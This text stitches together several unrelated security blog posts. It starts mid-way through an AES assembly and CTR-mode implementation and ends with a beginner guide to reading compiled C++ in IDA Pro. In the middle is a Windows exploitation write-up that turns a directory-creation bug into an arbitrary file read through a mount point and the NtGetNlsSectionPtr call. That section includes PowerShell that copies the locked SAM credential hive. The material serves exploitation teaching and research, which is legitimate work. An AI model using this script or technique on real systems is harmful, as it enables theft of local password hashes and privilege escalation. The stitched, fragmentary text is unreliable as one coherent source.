    mov    edx, eax          ; w2 = w0;
    xor    eax, ebx          ; w0^= w1;
    call   ebp               ; w0 = M(w0);
    xor    eax, edx          ; w0^= w2;
    ror    ebx, 16           ; w1 = R(w1,16);
    xor    eax, ebx          ; w0^= w1;
    ror    ebx, 8            ; w1 = R(w1,8);
    xor    eax, ebx          ; w0^= w1;
    stosd                    ; x[i] = w0;
    loop   mix_cols
    popad
    jmp    enc_main

Counter Mode (CTR)

Block ciphers should never be used in Electronic Code Book (ECB) mode, and the ECB Penguin illustrates why.

 

 

 

 

 

 

As you can see, blocks of the same data using the same key result in the exact same ciphertexts, which is why modes of encryption were invented. Galois/Counter Mode (GCM) is authenticated encryption which uses Counter (CTR) mode to provide confidentiality.

The concept of CTR mode which turns a block cipher into a stream cipher was first proposed by Whitfield Diffie and Martin Hellman in their 1979 publication, Privacy and Authentication: An Introduction to Cryptography.

CTR mode works by encrypting a nonce and counter, then using the ciphertext to encrypt our plain text using a simple XOR operation. Since AES encrypts 16-byte blocks, a counter can be 8-bytes, and a nonce 8-bytes.

The following is a very simple implementation of this mode using the AES-128 implementation.

// encrypt using Counter (CTR) mode
void encrypt(W len, B *ctr, B *in, B *key){
    W i,r;
    B t[32];

    // copy master key to local buffer
    F(16)t[i+16]=key[i];

    while(len){
      // copy counter+nonce to local buffer
      F(16)t[i]=ctr[i];
      
      // encrypt t
      E(t);
      
      // XOR plaintext with ciphertext
      r=len>16?16:len;
      F(r)in[i]^=t[i];
      
      // update length + position
      len-=r;in+=r;
      
      // update counter
      for(i=15;i>=0;i--)
        if(++ctr[i])break;
    }
}

In assembly

; void encrypt(W len, B *ctr, B *in, B *key)
_encrypt:
    pushad
    lea    esi,[esp+32+4]
    lodsd
    xchg   eax, ecx          ; ecx = len
    lodsd
    xchg   eax, ebp          ; ebp = ctr
    lodsd
    xchg   eax, edx          ; edx = in
    lodsd
    xchg   esi, eax          ; esi = key
    pushad                   ; alloca(32)
; copy master key to local buffer
; F(16)t[i+16]=key[i];
    lea    edi, [esp+16]     ; edi = &t[16]
    movsd
    movsd
    movsd
    movsd
aes_l0:
    xor    eax, eax
    jecxz  aes_l3            ; while(len){
; copy counter+nonce to local buffer
; F(16)t[i]=ctr[i];
    mov    edi, esp          ; edi = t
    mov    esi, ebp          ; esi = ctr
    push   edi
    movsd
    movsd
    movsd
    movsd
; encrypt t    
    call   _E                ; E(t)
    pop    edi
aes_l1:
; xor plaintext with ciphertext
; r=len>16?16:len;
; F(r)in[i]^=t[i];
    mov    bl, [edi+eax]     ; 
    xor    [edx], bl         ; *in++^=t[i];
    inc    edx               ; 
    inc    eax               ; i++
    cmp    al, 16            ;
    loopne aes_l1            ; while(i!=16 && --ecx!=0)
; update counter
    xchg   eax, ecx          ; 
    mov    cl, 16
aes_l2:
    inc    byte[ebp+ecx-1]   ;
    loopz  aes_l2            ; while(++c[i]==0 && --ecx!=0)
    xchg   eax, ecx
    jmp    aes_l0
aes_l3:
    popad
    popad
    ret

Summary

The final assembly code for ECB mode is 205 bytes, and 272 for CTR mode.

Check sources here.

Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read

For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2 hour slot fails to do the topic justice and some interesting tips and tricks I would like to present have to be cut out. So as the likelihood of a full training course any time soon is pretty low, I thought I’d put together an irregular series of blog posts which detail small, self contained exploitation tricks which you can put to use if you find similar security vulnerabilities in Windows.

 

In this post I’m going to give a technique to go from an arbitrary directory creation vulnerability to arbitrary file read. Arbitrary direction creation vulnerabilities do exist — for example, here’s one that was in the Linux subsystem — but it’s not always obvious how you’d exploit such a bug in contrast to arbitrary file creation where a DLL is dropped somewhere. You could abuse DLL Redirection support where you create a directory calling program.exe.local to do DLL planting but that’s not always reliable as you’ll only be able to redirect DLLs not in the same directory (such as System32) and only ones which would normally go via Side-by-Side DLL loading.

 

For this blog we’ll use my example driver from the Workshop which already contains a vulnerable directory creation bug, and we’ll write a Powershell script to exploit it using my NtObjectManager module. The technique I’m going to describe isn’t a vulnerability, but it’s something you can use if you have a separate directory creation bug.

Quick Background on the Vulnerability Class

When dealing with files from the Win32 API you’ve got two functions, CreateFile and CreateDirectory. It would make sense that there’s a separation between the two operations. However at the Native API level there’s only ZwCreateFile, the way the kernel separates files and directories is by passing either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE to the CreateOptions parameter when calling ZwCreateFile. Why the system call is for creating a file and yet the flags are named as if Directories are the main file type I’ve no idea.

 

A very simple vulnerable example you might see in a kernel driver looks like the following:

 

NTSTATUS KernelCreateDirectory(PHANDLE Handle,

                              PUNICODE_STRING Path) {
 IO_STATUS_BLOCK io_status = { 0 };
 OBJECT_ATTRIBUTES obj_attr = { 0 };

 InitializeObjectAttributes(&obj_attr, Path,
    OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE);
 
 return ZwCreateFile(Handle, MAXIMUM_ALLOWED,

                     &obj_attr, &io_status,
                     NULL, FILE_ATTRIBUTE_NORMAL,

                    FILE_SHARE_READ | FILE_SHARE_DELETE,
                    FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0);
}

 

There’s three important things to note about this code that determines whether it’s a vulnerable directory creation vulnerability. Firstly it’s passing FILE_DIRECTORY_FILE to CreateOptions which means it’s going to create a directory. Second it’s passing as the Disposition parameter FILE_OPEN_IF. This means the directory will be created if it doesn’t exist, or opened if it does. And thirdly, and perhaps most importantly, the driver is calling a Zw function, which means that the call to create the directory will default to running with kernel permissions which disables all access checks. The way to guard against this would be to pass the OBJ_FORCE_ACCESS_CHECK attribute flag in the OBJECT_ATTRIBUTES, however we can see with the flags passed to InitializeObjectAttributes the flag is not being set in this case.

 

Just from this snippet of code we don’t know where the destination path is coming from, it could be from the user or it could be fixed. As long as this code is running in the context of the current process (or is impersonating your user account) it doesn’t really matter. Why is running in the current user’s context so important? It ensures that when the directory is created the owner of that resource is the current user which means you can modify the Security Descriptor to give you full access to the directory. In many cases even this isn’t necessary as many of the system directories have a CREATOR OWNER access control entry which ensures that the owner gets full access immediately.

Creating an Arbitrary Directory

If you want to follow along you’ll need to setup a Windows 10 VM (doesn’t matter if it’s 32 or 64 bit) and follow the details in setup.txt from the zip file containing my Workshop driver. Then you’ll need to install the NtObjectManager Powershell Module. It’s available on the Powershell Gallery, which is an online module repository so follow the details there.

Assuming that’s all done, let’s get to work. First let’s look how we can call the vulnerable code in the driver. The driver exposes a Device Object to the user with the name \Device\WorkshopDriver (we can see the setup in the source code). All “vulnerabilities” are then exercised by sending Device IO Control requests to the device object. The code for the IO Control handling is in device_control.c and we’re specifically interested in the dispatch. The code ControlCreateDir is the one we’re looking for, it takes the input data from the user and uses that as an unchecked UNICODE_STRING to pass to the code to create the directory. If we look up the code to create the IOCTL number we find ControlCreateDir is 2, so let’s use the following PS code to create an arbitrary directory.

 

Import-Module NtObjectManager

# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl {
   Param([int]$ControlCode)
   [NtApiDotNet.NtIoControlCode]::new(«Unknown»,`
       0x800 bor $ControlCode, «Buffered», «Any»)
}

function New-Directory {
 Param([string]$Filename)
 # Open the device driver.
 Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
   # Get IOCTL for ControlCreateDir (2)
   $ioctl = Get-DriverIoCtl ControlCode 2
   # Convert DOS filename to NT
   $nt_filename = [NtApiDotNet.NtFileUtils]::DosFileNameToNt($Filename)
   $bytes = [Text.Encoding]::Unicode.GetBytes($nt_filename)
   $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
 }
}

 

The New-Directory function first opens the device object, converts the path to a native NT format as an array of bytes and calls the DeviceIoControl function on the device. We could just pass an integer value for control code but the NT API libraries I wrote have an NtIoControlCode type to pack up the values for you. Let’s try it and see if it works to create the directory c:\windows\abc.


It works and we’ve successfully created the arbitrary directory. Just to check we use Get-Acl to get the Security Descriptor of the directory and we can see that the owner is the ‘user’ account which means we can get full access to the directory.

Now the problem is what to do with this ability? There’s no doubt some system service which might look up in a list of directories for an executable to run or a configuration file to parse. But it’d be nice not to rely on something like that. As the title suggested instead we’ll convert this into an arbitrary file read, how might do we go about doing that?

Mount Point Abuse

If you’ve watched my talk on Abusing Windows Symbolic Links you’ll know how NTFS mount points (or sometimes Junctions) work. The $REPARSE_POINT NTFS attribute is stored with the Directory which the NTFS driver reads when opening a directory. The attribute contains an alternative native NT object manager path to the destination of the symbolic link which is passed back to the IO manager to continue processing. This allows the Mount Point to work between different volumes, but it does have one interesting consequence. Specifically the path doesn’t have to actually to point to another directory, what if we give it a path to a file?

 

If you use the Win32 APIs it will fail and if you use the NT apis directly you’ll find you end up in a weird paradox. If you try and open the mount point as a file the error will say it’s a directory, and if you instead try to open as a directory it will tell you it’s really a file. Turns out if you don’t specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE then the NTFS driver will pass its checks and the mount point can actually redirect to a file.

Perhaps we can find some system service which will open our file without any of these flags (if you pass FILE_FLAG_BACKUP_SEMANTICS to CreateFile this will also remove all flags) and ideally get the service to read and return the file data?

National Language Support

Windows supports many different languages, and in order to support non-unicode encodings still supports Code Pages. A lot is exposed through the National Language Support (NLS) libraries, and you’d assume that the libraries run entirely in user mode but if you look at the kernel you’ll find a few system calls here and there to support NLS. The one of most interest to this blog is the NtGetNlsSectionPtr system call. This system call maps code page files from the System32 directory into a process’ memory where the libraries can access the code page data. It’s not entirely clear why it needs to be in kernel mode, perhaps it’s just to make the sections shareable between all processes on the same machine. Let’s look at a simplified version of the code, it’s not a very big function:

 

NTSTATUS NtGetNlsSectionPtr(DWORD NlsType,

                           DWORD CodePage,
                           PVOID *SectionPointer,

                           PULONG SectionSize) {
 UNICODE_STRING section_name;
 OBJECT_ATTRIBUTES section_obj_attr;
 HANDLE section_handle;
 RtlpInitNlsSectionName(NlsType, CodePage, &section_name);
 InitializeObjectAttributes(&section_obj_attr,

                            &section_name,
                            OBJ_KERNEL_HANDLE |

                            OBJ_OPENIF |

                            OBJ_CASE_INSENSITIVE |

                            OBJ_PERMANENT);
    
 // Open section under \NLS directory.
 if (!NT_SUCCESS(ZwOpenSection(&section_handle,

                        SECTION_MAP_READ,

                        &section_obj_attr))) {
   // If no section then open the corresponding file and create section.
   UNICODE_STRING file_name;

   OBJECT_ATTRIBUTES obj_attr;
   HANDLE file_handle;


   RtlpInitNlsFileName(NlsType,

                       CodePage,

                       &file_name);
   InitializeObjectAttributes(&obj_attr,

                              &file_name,
                              OBJ_KERNEL_HANDLE |

                              OBJ_CASE_INSENSITIVE);
   ZwOpenFile(&file_handle, SYNCHRONIZE,

              &obj_attr, FILE_SHARE_READ, 0);
   ZwCreateSection(&section_handle, FILE_MAP_READ,

                   &section_obj_attr, NULL,

                   PROTECT_READ_ONLY, MEM_COMMIT, file_handle);
   ZwClose(file_handle);
 }

 // Map section into memory and return pointer.
 NTSTATUS status = MmMapViewOfSection(

                     section_handle,
                     SectionPointer,
                     SectionSize);
 ZwClose(section_handle);
 return status;
}

 

The first thing to note here is it tries to open a named section object under the \NLS directory using a name generated from the CodePage parameter. To get an idea what that name looks like we’ll just list that directory:


The named sections are of the form NlsSectionCP<NUM> where NUM is the number of the code page to map. You’ll also notice there’s a section for a normalization data set. Which file gets mapped depends on the first NlsType parameter, we don’t care about normalization for the moment. If the section object isn’t found the code builds a file path to the code page file, opens it with ZwOpenFile and then calls ZwCreateSection to create a read-only named section object. Finally the section is mapped into memory and returned to the caller.

 

There’s two important things to note here, first the OBJ_FORCE_ACCESS_CHECK flag is not being set for the open call. This means the call will open any file even if the caller doesn’t have access to it. And most importantly the final parameter of ZwOpenFile is 0, this means neither FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE is being set. Not setting these flags will result in our desired condition, the open call will follow the mount point redirection to a file and not generate an error. What is the file path set to? We can just disassemble RtlpInitNlsFileName to find out:

 

void RtlpInitNlsFileName(DWORD NlsType,

                        DWORD CodePage,

                        PUNICODE_STRING String) {
 if (NlsType == NLS_CODEPAGE) {
    RtlStringCchPrintfW(String,

             L»\\SystemRoot\\System32\\c_%.3d.nls», CodePage);
 } else {
    // Get normalization path from registry.
    // NOTE about how this is arbitrary registry write to file.
 }
}

 

The file is of the form c_<NUM>.nls under the System32 directory. Note that it uses the special symbolic link \SystemRoot which points to the Windows directory using a device path format. This prevents this code from being abused by redirecting drive letters and making it an actual vulnerability. Also note that if the normalization path is requested the information is read out from a machine registry key, so if you have an arbitrary registry value writing vulnerability you might be able to exploit this system call to get another arbitrary read, but that’s for the interested reader to investigate.

 

I think it’s clear now what we have to do, create a directory in System32 with the name c_<NUM>.nls, set its reparse data to point to an arbitrary file then use the NLS system call to open and map the file. Choosing a code page number is easy, 1337 is unused. But what file should we read? A common file to read is the SAM registry hive which contains logon information for local users. However access to the SAM file is usually blocked as it’s not sharable and even just opening for read access as an administrator will fail with a sharing violation. There’s of course a number of ways you can get around this, you can use the registry backup functions (but that needs admin rights) or we can pull an old copy of the SAM from a Volume Shadow Copy (which isn’t on by default on Windows 10). So perhaps let’s forget about… no wait we’re in luck.

 

File sharing on Windows files depends on the access being requested. For example if the caller requests Read access but the file is not shared for read access then it fails. However it’s possible to open a file for certain non-content rights, such as reading the security descriptor or synchronizing on the file object, rights which are not considered when checking the existing file sharing settings. If you look back at the code for NtGetNlsSectionPtr you’ll notice the only access right being requested for the file is SYNCHRONIZE and so will always allow the file to be opened even if locked with no sharing access.

 

But how can that work? Doesn’t ZwCreateSection need a readable file handle to do the read-only file mapping. Yes and no. Windows file objects do not really care whether a file is readable or writable. Access rights are associated with the handle created when the file is opened. When you call ZwCreateSection from user-mode the call eventually tries to convert the handle to a pointer to the file object. For that to occur the caller must specify what access rights need to be on the handle for it to succeed, for a read-only mapping the kernel requests the handle has Read Data access. However just as with access checking with files if the kernel calls ZwCreateSection access checking is disabled including when converting a file handle to the file object pointer. This results in ZwCreateSection succeeding even though the file handle only has SYNCHRONIZE access. Which means we can open any file on the system regardless of it’s sharing mode and that includes the SAM file.

 

So let’s put the final touches to this, we create the directory \SystemRoot\System32\c_1337.nls and convert it to a mount point which redirects to \SystemRoot\System32\config\SAM. Then we call NtGetNlsSectionPtr requesting code page 1337, which creates the section and returns us a pointer to it. Finally we just copy out the mapped file memory into a new file and we’re done.

 

$dir = «\SystemRoot\system32\c_1337.nls»
New-Directory $dir
 
$target_path = «\SystemRoot\system32\config\SAM»
Use-NtObject($file = Get-NtFile $dir `

            —Options OpenReparsePoint,DirectoryFile) {
 $file.SetMountPoint($target_path, $target_path)
}

Use-NtObject($map =

    [NtApiDotNet.NtLocale]::GetNlsSectionPtr(«CodePage», 1337)) {
 Use-NtObject($output = [IO.File]::OpenWrite(«sam.bin»)) {
   $map.GetStream().CopyTo($output)
   Write-Host «Copied file»
 }
}

 

Loading the created file in a hex editor shows we did indeed steal the SAM file.


For completeness we’ll clean up our mess. We can just delete the directory by opening the directory file with the Delete On Close flag and then closing the file (making sure to open it as a reparse point otherwise you’ll try and open the SAM again). For the section as the object was created in our security context (just like the directory) and there was no explicit security descriptor then we can open it for DELETE access and call ZwMakeTemporaryObject to remove the permanent reference count set by the original creator with the OBJ_PERMANENT flag.

 

Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
                   Access Delete) {
 # Delete permanent object.
 $sect.MakeTemporary()
}

What I’ve described in this blog post is not a vulnerability, although certainly the code doesn’t seem to follow best practice. It’s a system call which hasn’t changed since at least Windows 7 so if you find yourself with an arbitrary directory creation vulnerability you should be able to use this trick to read any file on the system regardless of whether it’s already open or shared. I’ve put the final script on GITHUB at this link if you want the final version to get a better understanding of how it works.

 

It’s worth keeping a log of any unusual behaviours when you’re reverse engineering a product in case it becomes useful as I did in this case. Many times I’ve found code which isn’t itself a vulnerability but have has some useful properties which allow you to build out exploitation chains.

Reverse Engineering Basic Programming Concepts

Reverse Engineering

Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I’m a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy to comprehend, information all in one place. This “BOLO: Reverse Engineering” series is exactly that! Throughout this article series I will be showing you things to BOn the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts!

Preface

Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you’re seeing and why things look the way they look. Furthermore, This article series will not cover the basics of assembly, it will only present patterns and decompiled code so that you can get a general understanding of what to look for / how to interpret assembly code.

Throughout this article we will cover:

  1. Variable Initiation
  2. Basic Output
  3. Mathematical Operations
  4. Functions
  5. Loops (For loop / While loop)
  6. Conditional Statements (IF Statement / Switch Statement)
  7. User Input

please note: This tutorial was made with visual C++ in Microsoft Visual Studio 2015 (I know, outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler.


Variable Initiation

Variables are extremely important when programming, here we can see a few important variables:

  1. a string
  2. an int
  3. a boolean
  4. a char
  5. a double
  6. a float
  7. a char array
Basic Variables

Please note: In C++, ‘string’ is not a primitive variable but I thought it important to show you anyway.

Now, lets take a look at the assembly:

Initiating Variables

Here we can see how IDA represents space allocation for variables. As you can see, we’re allocating space for each variable before we actually initialize them.

Initializing Variables

Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation.

C++ String Initiation

As you can see, initiating a string requires a call to a built in function for initiation.

Basic Output

preface info: Throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article.

Although this tutorial was built in visual C++, I opted to use printf rather than cout for output.

Basic Output

Now, let’s take a look at the assembly:

First, the string literal:

String Literal Output

As you can see, the string literal is pushed onto the stack to be called as a parameter for the printf function.

Now, let’s take a look at one of the variable outputs:

Variable Output

As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the “%i” string literal used to indicate integer output. These variables are then taken from the stack and used as parameters when calling the printf function.

Mathematical Functions

In this section, we’ll be going over the following mathematical functions:

  1. Addition
  2. Subtraction
  3. Multiplication
  4. Division
  5. Bitwise AND
  6. Bitwise OR
  7. Bitwise XOR
  8. Bitwise NOT
  9. Bitwise Right-Shift
  10. Bitwise Left-Shift
Mathematical Functions Code

Let’s break each function down into assembly:

First, we set A to hex 0A, which represents decimal 10, and to hex 0F, which represents decimal 15.

Variable Setting

We add by using the ‘add’ opcode:

Addition

We subtract using the ‘sub’ opcode:

Subtraction

We multiply using the ‘imul’ opcode:

Multiplication

We divide using the ‘idiv’ opcode. In this case, we also use the ‘cdq’ to double the size of EAX so that we can fit the output of the division operation.

Division

We perform the Bitwise AND using the ‘and’ opcode:

Bitwise AND

We perform the Bitwise OR using the ‘or’ opcode:

Bitwise OR

We perform the Bitwise XOR using the ‘xor’ opcode:

Bitwise XOR

We perform the Bitwise NOT using the ‘not’ opcode:

Bitwise NOT

We peform the Bitwise Right-Shift using the ‘sar’ opcode:

Bitwise Right-Shift

We perform the Bitwise Left-Shift using the ‘shl’ opcode:

Bitwise Left-Shift

Function Calls

In this section, we’ll be looking at 3 different types of functions:

  1. a basic void function
  2. a function that returns an integer
  3. a function that takes in parameters

Calling Functions

First, let’s take a look at calling newfunc() and newfuncret() because neither of those actually take in any parameters.

Calling Functions Without Parameters

If we follow the call to the newfunc() function, we can see that all it really does is print out “Hello! I’m a new function!”:

The newfunc() Function Code
The newfunc() Function

As you can see, this function does use the retn opcode but only to return back to the previous location (so that the program can continue after the function completes.) Now, let’s take a look at the newfuncret() function which generates a random integer using the C++ rand() function and then returns said integer.

The newfuncret() Function Code
The newfuncret() function

First, space is allocated for the A variable. Then, the rand() function is called, which returns a value into the EAX register. Next, the EAX variable is moved into the A variable space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value.

Now that we have an understanding of how to call function and what it looks like when a function returns something, let’s talk about calling functions with parameters:

First, let’s take another look at the call statement:

Calling a Function with Parameters in C++
Calling a Function with Parameters

Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First ,you move the variable into a register, then you push the registers on the stack, then you call the function.

Let’s take a look at the function’s code:

The funcparams() Function Code
The funcparams() Function

All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the 3 variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy Peasy.

Loops

Now that we have function calling, output, variables, and math down, let’s move on to flow control. First, we’ll start with a for loop:

For Loop Code
A graphical Overview of the For Loop

Before we break down the assembly code into smaller sections, let’s take a look at the general layout. As you can see, when the for loop starts, it has 2 options; It can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop.

Detailed For Loop

First, we check if we’ve hit the maximum value by comparing the i variable to the max variable. If the i variable is not greater than or equal to the maxvariable, we continue down to the left and print out the i variable then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return.

Now, let’s take a look at a while loop:

While Loop Code
While Loop

In this loop, all we’re doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print “I’m out!” otherwise, we continue to loop.

In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out “I’m out” and then return.

If Statements

Next, we’ll be talking about if statements. First, let’s take a look at the code:

IF Statement Code

This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out “greater than 15”. If A is less than 15 but greater than 10, the program will print out “less than 15, greater than 10”. This pattern will continue until A is less than 5, in which case the program will print out “less than 5”.

Now, let’s take a look at the assembly graph:

IF Statement Assembly Graph

As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply “If X Then Y Else Z”. IF we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out “greater than 15” and then return. Otherwise, the program will compare A to hex 0A which represents decimal 10. This pattern will continue until the program prints and returns.

Switch Statements

Switch statements are a lot like IF statements except in a Switch statement one variable or statement is compared to a number of ‘cases’ (or possible equivalences). Let’s take a look at our code:

Switch Statement Code

In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. IfA is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return.

Now, let’s take a look at the assembly graph:

Switch Case Assembly Graph

Unlike IF statements, switch statements do not follow the “If X Then Y Else Z” rule, instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement’s equivalent. Le’ts first take a look at the initial 2 boxes:

The First 2 Graph Sections

First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case’s section:

In the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out “5” and then jump to the return section.

User Input

In this section, we’ll cover user input using the C++ cin function. First, let’s look at the code:

User Input Code

In this function, we simply take in a string to the variable sentence using the C++ cin function and then we print out sentence through a printf statement.

Le’ts break this down into assembly. First, the C++ cin part:

C++ cin

This code simply initializes the string sentence then calls the cin function and sets the input to the sentence variable. Let’s take a look at the cin call a bit closer:

The C++ cin Function Upclose

First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function which is then called and has it’s output moved into ECX, which is then put on the stack for the printf statement:

User Input printf Statement

Thanks!